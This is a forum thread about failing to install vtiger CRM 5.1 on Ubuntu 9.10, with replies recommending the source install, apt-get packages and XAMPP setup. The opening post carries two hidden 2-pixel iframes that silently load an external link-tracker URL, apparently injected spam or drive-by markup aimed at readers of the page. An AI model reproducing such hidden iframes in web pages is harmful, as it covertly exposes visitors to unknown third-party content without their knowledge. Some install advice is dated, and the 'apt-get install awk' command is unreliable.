I can not install on Ubuntu 9.10

I can not install the latest version of vtiger crm in ubuntu.

I try to put the log there, most of the error, says it is to prevent spam.

How do I put the error? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

  • i believe it is already a file system, it can not find any file like that except in vtiger own folder.

my doubt is what we need to do?

ja the file. bin has apache, mysql right?
  • my advice is not to use the .bin installer with ubuntu. it is a lot easier just to use the source install version.

    /home/livre/vtigercrm-5.1.0.bin: 2575: awku=/usr/bin/awk: not found

this means a program called awk is not installed
    apt-get install awk might help

it seems also that apache will be installad as httpd...im not sure if it matters, but you can get the apache via ubuntus repository and it is not installad as httpd, but apache2.

    apt-get install apache2

by using the bin installer in ubuntu, you are actually making the install process a lot harder, than it would be in source install.

and btw, you dont have to compile any source when using the source install, so the name "source" might give you the creeps...
  • hi vtigers,

i have been building windows based vtiger for a couple of years now. i generally understand how to get it all installed and running.

i now want to build a linux box and run vtiger on that. so far i have ubuntu and xampp running ok.

but i'm stuck on how to get vtiger 5.1 installed. in the terminal i am at

    root@ubuntu-desktop:/home/bernard#

where do i go from here. i have both the .bin and .tar gz files.

    cheers
    bernard
  • i suggest you don't be afraid of source code. in fact vtiger is very easy to set up vía source code.

if you are using ubuntu i'm sure you already have apache, mysql and php up and running.

test each component alone: a php file with phpinfo() funtion call, and a mysql database. once you have this you will be able to set up vtiger in no time, since it's just a matter of unpack it and run the confi script.
  • by the way: httpd.conf file if the apache config file and is located under /etc, unless you are running under a shared hosting provider, in which case you should ask where is it located.
  • jsarachaga,

i think your responses are related to matti's post not mine?

    any help is appreciated.

    cheers

  • hi bernardgbailey,
in linux xampp you can install vtiger source and you need to configure php.ini as per recommended by the vtiger.
for setting up php extensions go through this url
    http://wiki.vtiger.com/index.php/vtiger510:installation_on_linux#php_extensions

please go through this documentation for downloading the source .
    http://sourceforge.net/projects/vtigercrm/files/vtiger%20crm%205.1.0rc/vtigercrm-5.1.0rc.tar.gz

place the vtigercrm.tar.gz file in your xampp web server root and extract it will be named as vtigercrm
now you cn access through browser like
    http://localhost/vtigercrm
go through this url for vtigercrm configuration
    http://wiki.vtiger.com/index.php/vtiger510:installation#client_installation_screen_shots
